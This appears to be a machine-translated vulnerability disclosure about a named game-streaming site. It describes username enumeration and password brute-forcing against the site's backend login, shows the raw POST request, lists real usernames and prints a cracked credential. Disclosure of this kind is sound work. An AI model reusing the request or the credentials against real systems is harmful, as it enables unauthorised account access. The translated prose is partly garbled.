A giant network design defect cracking Weak Password

Source: Internet
Author: User

A giant network design defect cracking Weak Password

It's not easy. Ask for a homepage and a high rank.

We all know dudu.

Dudu.ztgame.com

They are all broadcasters. In theory, they all have backend management. Find them.


Google hack.

Http://bb.ztgame.com/backend/index/login
 


As you can see, when the user name does not exist, there will be a corresponding prompt, so let's crack it.
 

POST /backend/index/login HTTP/1.1Host: bb.ztgame.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://bb.ztgame.com/backend/index/loginCookie: DUDUSID=bv84pt4togkebssqf880g5fc81Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 31username=liubin&password=123456


We can see that several user names have been successfully run.

Zhanghao

Liubin

Liting

Zhangwei

Set the user name and run the password again.

Ran times and finally ran out.

 

Liubin/1, 567890

Log in

There are a lot of background functions, and I will not describe the harms of various permissions. Go straight to the back-end.

 


You can also describe the functions, such as user management, video monitoring, scheduling, and configuration. Various anchor operations, T people, etc.

Solution:

Fix.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.